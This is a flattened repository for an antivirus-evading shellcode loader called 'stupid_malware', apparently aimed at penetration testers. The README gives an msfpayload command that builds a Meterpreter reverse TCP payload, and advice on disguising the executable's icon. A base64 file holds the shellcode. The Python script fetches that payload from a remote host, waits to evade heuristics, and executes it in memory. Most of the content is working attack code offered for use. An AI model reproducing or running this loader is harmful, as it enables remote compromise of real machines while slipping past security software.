├── README.md ├── evil.b64 └── stupid_malware.py /README.md: -------------------------------------------------------------------------------- 1 | stupid_malware 2 | ============== 3 | 4 | ## SUMMARY 5 | 6 | Python malware for pentesters that bypasses most antivirus (signature and heuristics) and IPS using sheer stupidity. Uses cutting-edge base64 encoding and the newfangled "sleep" method to wait until heuristics detaches to execute all evil activity. Code on disk is 100% benign and evil code never leaves memory. Compile with py2exe or pyinstaller. 7 | 8 | ## USAGE 9 | 10 | Package generation: 11 | ``` 12 | $ msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=127.0.0.1 R | base64 > evil.b64 13 | ``` 14 | If you do so please, change the icon and attributes with ResHacker 15 | ## CHANGELOG 16 | * v0.2 - Added base64 decoding to bypass crappy IPS 17 | * v0.3 - Added a sleep(31) statement before executing shellcode to fuck with heuristics 18 | 19 | ## DISCLAIMER 20 | 21 | Don't be an asshole. I take no responsibility for how you use this. It's not even that cool so you should probably use someone else's code. 22 | -------------------------------------------------------------------------------- /evil.b64: -------------------------------------------------------------------------------- 1 | /OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaDMyAABod3MyX1RoTHcmB//VuJABAAApxFRQaCmAawD/1VBQUFBAUEBQaOoP3+D/1ZdqBWh/AAABaAIAEVyJ5moQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGhfZ17MM= 2 | -------------------------------------------------------------------------------- /stupid_malware.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from ctypes import * 4 | from base64 import b64decode 5 | from urllib import urlopen 6 | from time import sleep 7 | 8 | URL = "http://server.com/evil.b64" # This should be changed to wherever you are hosting your malware package 9 | 10 | downloader = urlopen(URL) # download the package 11 | shellcode = b64decode(downloader.read()) # de-base64 the shellcode 12 | sleep(31) # avoid time-based heuristics 13 | array = create_string_buffer(shellcode, len(shellcode)) 14 | shell = cast(array, CFUNCTYPE(c_void_p)) 15 | shell() 16 | --------------------------------------------------------------------------------